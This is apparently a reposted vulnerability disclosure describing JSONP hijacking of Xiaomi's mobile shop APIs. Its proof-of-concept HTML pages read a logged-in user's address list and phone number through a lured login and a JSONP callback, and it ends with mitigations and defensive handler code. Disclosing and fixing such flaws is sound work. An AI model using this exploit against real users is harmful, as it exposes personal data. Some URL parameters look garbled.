Xiaomi JS hijacking can obtain user addresses and order information (a technique for mining mobile client APIs)

Source: Internet
Author: User

The application fetches its data via JSONP, so the callback responses can naturally be captured by a third-party page.

The Xiaomi Mall mobile client is actually a built-in browser that loads m.xiaomi.com; the user's address, order and other data live on app.shopapi.xiaomi.com. Presumably JSONP is used for the cross-origin requests, with the result that JavaScript hijacking can be used to obtain user data.

Test process:

1. Enable Burp and its proxy listener.

2. Configure the phone to use that proxy, inspect the HTTP requests, and observe a series of requests carrying a callback parameter.

3. From step 2, only m.xiaomi.com can be JS-hijacked. What about www.xiaomi.com and the other domain names?

4. It was found that the login interface used by m.xiaomi.com is https://account.xiaomi.com/pass/serviceLogin?callback=...&sid=eshopmobile. The key point is eshopmobile (a login with sid=eshopmobile also logs the user in to app.shopapi.xiaomi.com synchronously), while eshop

5. Following the analysis in step 4: if a logged-in user is lured into visiting https://account.xiaomi.com/pass/serviceLogin?callback=...&sid=eshopmobile, the main domain and the other domain names can also be JS-hijacked.

6. Script for hijacking the user's address list:

xiaomi.html

<iframe src="https://account.xiaomi.com/pass/serviceLogin?Signature%2523ac%253Daccount%2526op%253Dindex%26sign%signature%2C%2C&sid=esw.mobile"></iframe> <!-- The sign parameter is used for verification; it differs on every login and does not affect the hijacking. -->
<script>
// Give the iframe time to complete the eshopmobile login, then load the second page.
setTimeout(function () { location.href = 'xiaomi2.html'; }, 3000);
</script>

xiaomi2.html

<script>
// Callback invoked by the JSONP response; o.data is the address list.
function getall(o) {
  var data = o.data;
  alert(data[0].consignee + ' ' + data[0].tel);
}
</script>
<script src="http://app.shopapi.xiaomi.com/v1/address/list?callback=getall&client_id=180100031013&_=1367750497612"></script>
Solution:

1. Return pure JSON instead, and handle the cross-origin case via the P3P header.

2. If JSONP is required, check the Referer and User-Agent headers.
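The two fixes above, as an added example (this is not Xiaomi's code): a hardened handler for an address-list endpoint that serves pure JSON by default and only emits JSONP for a validated callback name and an allowlisted Referer. The host allowlist, the sample data and the response shape are assumptions.

```javascript
// Added example, not part of the original report or Xiaomi's code base.
// Hypothetical allowlist of first-party pages permitted to use JSONP.
const ALLOWED_REFERER_HOSTS = new Set(['m.xiaomi.com', 'www.xiaomi.com']);

// A JSONP callback must be a plain identifier, so the response body cannot
// carry attacker-chosen script text.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/;

// Constructed sample data standing in for the real address list.
function loadAddresses() {
  return [{ consignee: 'Sample Name', tel: '000-0000-0000' }];
}

// True only when the Referer header parses and its host is allowlisted.
// A missing Referer is treated as untrusted.
function refererAllowed(headers) {
  const ref = headers.referer;
  if (!ref) return false;
  try {
    return ALLOWED_REFERER_HOSTS.has(new URL(ref).hostname);
  } catch (e) {
    return false;
  }
}

// Returns {status, contentType, body} for a request given its parsed query
// string and (lower-cased) headers.
function handleAddressList(query, headers) {
  const json = JSON.stringify({ data: loadAddresses() });
  const cb = query.callback;
  if (cb === undefined) {
    // Pure JSON: a cross-origin <script src> cannot read this, so no hijack.
    return { status: 200, contentType: 'application/json', body: json };
  }
  if (!CALLBACK_RE.test(cb) || !refererAllowed(headers)) {
    return {
      status: 403,
      contentType: 'application/json',
      body: JSON.stringify({ error: 'jsonp not permitted' }),
    };
  }
  // JSONP only for allowlisted first-party pages. The leading comment keeps
  // the body from being interpreted as a file of another type.
  return {
    status: 200,
    contentType: 'application/javascript',
    body: '/**/' + cb + '(' + json + ');',
  };
}
```

A User-Agent check can be added beside the Referer check, but both headers are client-controlled, so this only blocks browser-based hijacking, not a hostile client; pure JSON (option 1) is the stronger fix.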
